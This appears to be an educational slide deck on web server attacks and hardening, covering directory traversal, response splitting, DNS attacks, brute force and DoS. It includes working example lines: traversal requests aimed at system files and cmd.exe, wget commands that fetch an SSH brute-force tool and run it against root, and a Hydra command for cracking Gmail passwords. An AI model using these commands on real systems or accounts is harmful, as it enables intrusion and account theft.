2. The StoryThe Story
Once upon a time, there lived a lady, Pinky, and she owned a website and had hired a
Security Consultant to protect her website from malicious attackers.
One fine day,around 2:00 AM in the morning, she wanted to check her website and
found that the website has been HACKED. She immediately called her security guy and
told about the website getting hacked.
The poor chap was leisurely enjoying his dinner, 2:00 AM, was stumbled. He jumped off
the bed to chair and verified that the website is intact with no harm.
He conveyed the same to Pinky but after all cleaning work like browser cookie cleaning,
deleting temp files and all other thing, pinky was still getting the hacked website. On the
other hand the Security Consultant was sure that the website has not been hacked.
The story ends here :)
3. Moral of The StoryMoral of The Story
The story in the previous slide suffers from an attack knows as Local DNS Cache
Poisoning Attack.
The attacker has poisoned the local DNS server of the lady and hence every time she is
requesting for the ip address of her website, she was getting the fake ip address of
hacked page.
On the other hand the Security Consultant was not attacked and hence he was able to
see the real website.
For more, please follow the discussion on slide no : 22
4. Agenda of the day ... ?
News
Terminology
Attacks
How to secure a web server ?
What to do Next ?
10. A complex system of interconnected elements.
Web... ?
The state of being free from danger or threat.
Security... ?
Web Security... ?
Web Security, also known as “Cyber security” involves protecting
information by preventing, detecting, and responding to attacks.
11. A server is simply a computer program software/hardware that dispenses web
responses as they are requested.
Server... ?
Types of Server... ?
Server Platform
Application Server
Audio/Video Server
Chat Server
Fax Server
Groupware Server
IRC Server
FTP Server
News Server
Proxy Server
Telnet Server
Virtual Servers
Web Server
List Server
Mail Server
Directory Server
15. Impact of Web-ServerAttacks... ?
Compromise of User Accounts
Data Tampering
Website Defacement
Secondary Attacks from the compromised website
Data Theft
Root Access to other Applications and Programs
17. ServerMisconfiguration Attack...
The following default or incorrect configuration in the httpd.conf file on an
Apache server does not restrict access to the server-status page:
<Location /server-status>
SetHandler server-status
</Location>
This configuration allows the server status page to be viewed.
Example :
18. Directory traversal is an HTTP exploit which allows attackers to access restricted
directories and execute commands outside of the web server's root directory.
Directory Traversal Attack... ?
Web servers provide two main levels of security mechanisms
Access Control Lists (ACLs)
Root directory
GET http://test.webarticles.com/show.asp?view=oldarchive.html HTTP/1.1
Host: test.webarticles.com
Example :
GET http://test.webarticles.com/show.asp?view=../../../../../Windows/system.ini HTTP/1.1
Host: test.webarticles.com
GET http://server.com/scripts/..%5c../Windows/System32/cmd.exe?/c+dir+c: HTTP/1.1
Host: server.com
19. Man-In-The-Middle Attack... ?
A man-in-the-middle attack is one in which the attacker secretly intercepts and relays
messages between two parties who believe they are communicating directly with each
other.
20. HTTPResponse Splitting Attack... ?
In the HTTP Response Splitting attack, there are always 3 parties (at least) involved :
Web server - which has a security hole enabling HTTP Response Splitting
Target - an entity that interacts with the web server on behalf of the attacker.
Attacker - initiates the attack
Header splitting is an attack designed to steal data from users of a site. It can be used
to execute cross site scripting attacks, steal user data, or deface sites such that they
appear to contain content the creator did not intend.
<?php
header ("Location: " . $_GET['page']);
?>
http://icis.digitalparadox.org/~dcrab/redirect.php?page=http://www.digitalparadox.org
Example :
21. HTTPCache Poisoning Attacks... ?
HTTP Cache Poisoning is actually a very straight forward modification to HTTP splitting
and can be achieved by simply adding a header indicating that the version of the page
being returned was last modified sometime in the future, which will in turn trigger the
browser to cache said page.
In fact, setting the last modified header for the page to the future ensures subsequent
requests for that page will result in a 304 Not Modified header response form the server,
until such a time that the cache is outdated.
foobar
Content-Length: 0
HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Mon, 28 Sep 2016 14:50:18 GMT
Content-Length: 47
Hacker was here
Example :
22. DNS Hijacking ... ?
DNS hijacking (sometimes referred to as DNS redirection) is a type of malicious attack that
overrides a computer’s TCP/IP settings to point it at a rogue DNS server, thereby invalidating the
default DNS settings
A hacker or a malware program gains unauthorized access to your computer and changes the
DNS settings, so that your computer now uses one of the rogue DNS servers that is owned and
maintained by the hacker.
Other dangers of DNS hijacking include the following attacks: Pharming
Phishing
23. DNS Amplification Attack... ?
A Domain Name Server (DNS) amplification attack is a popular form of distributed denial
of service (DDoS) that relies on the use of publically accessible open DNS servers to
overwhelm a victim system with DNS response traffic.
Impact
A misconfigured Domain Name System (DNS) server can be exploited to participate in a
distributed denial of service (DDoS) attack.
In March 2013, the method was used to target Spamhaus, likely by a purveyor of
malware whose business, the organization had disrupted by blacklisting. The
anonymity of the attack was such that Spamhaus is still unsure of the source.
Furthermore, the attack was so severe that it temporarily crippled and almost brought
down the Internet.
25. SSHBrute Force Attack... ?
SSH is an acronym which stands for Secure SHell, which provides a secure shell
access to a remote machine.
wget http://zeldor.biz/other/bruteforce/passlist.txt
wget http://zeldor.biz/other/bruteforce/brutessh.zip
python brutessh.py -h 10.1.100.4 -u root -d passlist.txt
26. Web-ServerPassword Cracking Attacks... ?
A hacker can use variety of password Cracking Techniques such as Brute force,
Dictionary attacks and rainbow tables to crack weak administrator account passwords,
For Gmail Password cracking Syntax are like below :-
hydra -S -l <email> -P <passlist.txt> -e ns -V -s 465 smtp.gmail.com smtp
Example : THC - Hydra
27. DOS/DDOS Attack... ?
Renders websites and other online resources unavailable to intended users.
DoS threats come in many flavors, with some directly targeting the underlying server
infrastructure. Others exploit vulnerabilities in application and communication protocols.
A successful DoS attack is a highly noticeable event impacting the entire online user
base. This makes it a popular weapon of choice for hacktivists, cyber vandals,
extortionists and anyone else looking to make a point or champion a cause.
A website in France was hammered by a Distributed Denial of Service attack
that hit it at a rate from 325Gbps to 400Gbps making it the strongest DDoS
attack ever.
28. Phishing Attacks ... ?
Phishing is an e-mail fraud method in
which the perpetrator sends out legitimate-
looking email in an attempt to gather
personal and financial information from
recipients.
Typically, the messages appear to come
from well known and trustworthy Web
sites.
Web sites that are frequently spoofed by
phishers include PayPal, eBay, MSN,
Yahoo, BestBuy, and America Online.
30. Website Defacement... ?
The term "website defacement" refers to any unauthorized changes made to the
appearance of either a single webpage, or an entire site.
In some cases, a website is completely taken down and replaced by something new.
In other instances, a hacker may inject code in order to add images, popups, or text to a
page that were not previously present.
37. Securing a Web Server.... ?
01. Remove Unnecessary Services
02. Remote access
03. Separate development / testing / production environment
04. Web application content and server-side scripting
05. Permissions and privileges
06. Install all security patches on time
07. Monitor and audit the server
08. User accounts
09. Remove all unused modules and application extensions
10. Use security tools provided with web server software
11. Stay informed
12. Use Scanners
38. Whats Cooking Next... ?
Webserver Attack Methodology
Application Security Scanner
Mirroring a Website
Vulnerability Scanning
Tools Demo :
Web Password Cracking Tool : THC-Hydra and Brutus
Web Server Security Scanner : Wikto and Acunetix Web Vulnerability Scanner
Web Server Pen Testing Tool : CORE Impact® Pro
Web Application Security Scanner: Syhunt Dynamic and N-Stalker Web
Enumerating Webserver Information Using Nmap